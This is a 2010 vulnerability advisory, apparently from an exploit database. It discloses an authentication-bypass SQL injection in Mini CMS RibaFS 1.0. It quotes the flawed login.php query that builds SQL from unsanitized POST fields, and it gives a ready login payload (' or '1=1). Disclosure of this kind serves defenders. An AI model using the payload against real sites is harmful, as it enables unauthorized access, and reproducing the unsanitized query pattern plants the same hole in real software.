Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:23428
HistoryMar 23, 2010 - 12:00 a.m.

Mini CMS RibaFS 1.0 (Auth Bypass) SQL Injection Vulnerability

2010-03-2300:00:00
vulners.com
23

=============================================================
Mini CMS RibaFS 1.0 (Auth Bypass) SQL Injection Vulnerability

[+] Mini CMS RibaFS 1.0 (Auth Bypass) SQL Injection Vulnerability

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'`\ /\ \ /'`\ 0
0 /\, \ ___ /\\/\\ \ \ \ \ ,\/\ \/\ \ _ ___ 1
1 \/
/\ \ /' _ `\ \/\ \/
/
\< /'
\ \ \/\ \ \ \ \/\`'\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \
/\ \ \\ \ \\ \ \ \/ 1
1 \ \\ \\ \\\ \ \ \/\ \\\ \
\\ \/\ \\ 0
0 \/
/\/
/\/
/\ \\ \/
/ \// \// \// \// 1
1 \ \
/ >> Exploit database separated by exploit 0
0 \/
/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ###################################### 1
0 I'm cr4wl3r member from Inj3ct0r Team 1
1 ###################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+] Discovered by: cr4wl3r
[+] My id: http://inj3ct0r.com/author/945
[+] Original: http://inj3ct0r.com/exploits/9667
[+] Download : http://code.google.com/p/minicmsribafs/downloads/list

[+] Code [login.php]

if (isset($_POST['login']))
{

include_once("./…/conexao.inc.php");

 $login=$_POST[&#39;login&#39;];
 $senha=$_POST[&#39;senha&#39;];  

 $senha=md5&#40;$senha&#41;;
 $sql=&quot; SELECT * FROM usuarios WHERE login =&#39;$login&#39; AND senha = &#39;$senha&#39; &quot;;

 $qry= mysql_query&#40;$sql&#41;;

[+] PoC: [path]/admin/login.php
Auth Bypass : ' or '1=1

[+] Greetz: All member inj3ct0r.com

Inj3ct0r.com [2010-03-22]